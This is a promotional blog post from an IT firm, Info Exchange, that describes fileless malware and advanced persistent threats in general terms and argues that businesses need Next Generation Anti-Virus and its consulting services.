While you are busy taking advantage of all the latest advances in IT which allow you greater ‘mobility’ where your work is concerned, someone else is rubbing their hands – the cyber-criminal.
The front line of the cyber war has moved away from the network perimeter and onto the endpoint. With the addition of each and every new endpoint device you use to access information, whether it is a PC, laptop, tablet, smartphone, virtual desktop or printer, the more vulnerable your system and network becomes.
Yes, signature-based Anti-Virus still works against nuisance malware that can damage productivity and consume IT time, but up against advanced threats that can cripple a company, traditional anti-virus doesn’t stand a chance.
The simple truth is that traditional anti-virus software can’t deal efficiently or effectively with today’s mobile user demands and the cyber-criminal’s constantly evolving tools of the trade. The results of an ineffective barrier between the two can be costly at best, and catastrophic at worst.
What Are Cyber criminals Up to?
So what is the cyber-criminal up to, and how are they targeting systems that you may not consider vulnerable, but they do? The answers should help you understand the vulnerabilities of traditional anti-virus software and why it is no longer adequate, thus giving rise to Next Generation Anti-Virus protection (NGAV).
Let’s consider the fileless infection (fileless malware), one of the hardest threats to detect because it does not exist in a file. It is devious in that malicious coding doesn’t install itself on your hard drive, but exists only in memory. Introduced into your system usually by visiting a malicious website or via email, intrusion detection and antivirus software are easily eluded.
Fileless malware can perform two roles – it can either harvest data, or it can install a more powerful form of undetectable malware. Code is injected into a running process within JAVA, or your browser, and then used for the exploit. As the fileless code is written directly to RAM, it will no longer exist after a reboot, so there is no chance of post-infection detection, but by then it will be too late anyway!
Advanced Persistent Threats
Then there are Advanced Persistent Threats (APTs) which use powerful scripting tools, including PowerShell, together with administrative applications, including PsExec and TeamViewer.
The cyber-criminal has moved on from the ‘Four Amigos’, Stuxnet, Flame, Gauss and DuQu, and now favors APT attacks which are not just difficult to stop, but are insidious in their nature through having the ability to lie dormant within a system. As APTs are usually operated remotely, often it is only through close analysis of outgoing data that any anomalies can be detected and any suspicions raised, so putting greater pressure on the need for full-time administration and oversight.
APTs are designed to access and ‘steal’ data which will have value in the market place. With the ability to remotely access your system, the hacker can simply sell that access to an interested party, and not just one, either. And that’s just for starters….
Next Generation Anti-Virus
In comes Next Generation Anti-Virus (NGAV), a system-centric platform which has performed well in detecting APTs. NGAV examines every process in memory, and on every endpoint, to algorithmically detect and block the malicious tools, tactics, techniques and procedures on which attackers rely, so even fileless malware are caught. Built on data science, machine learning and threat intelligence, NGAV provides context and insight in even previously unknown patterns of attack. Impressive!
So, maybe it’s time to talk to us here at Info Exchange. Our initial consultation will help to highlight possible vulnerabilities and we will work closely with your team to come up with a tailor-made plan of action integrated with a NGAV. Call us, or send us an email, and take the first step to ensuring you have the optimum cyber-security system in place.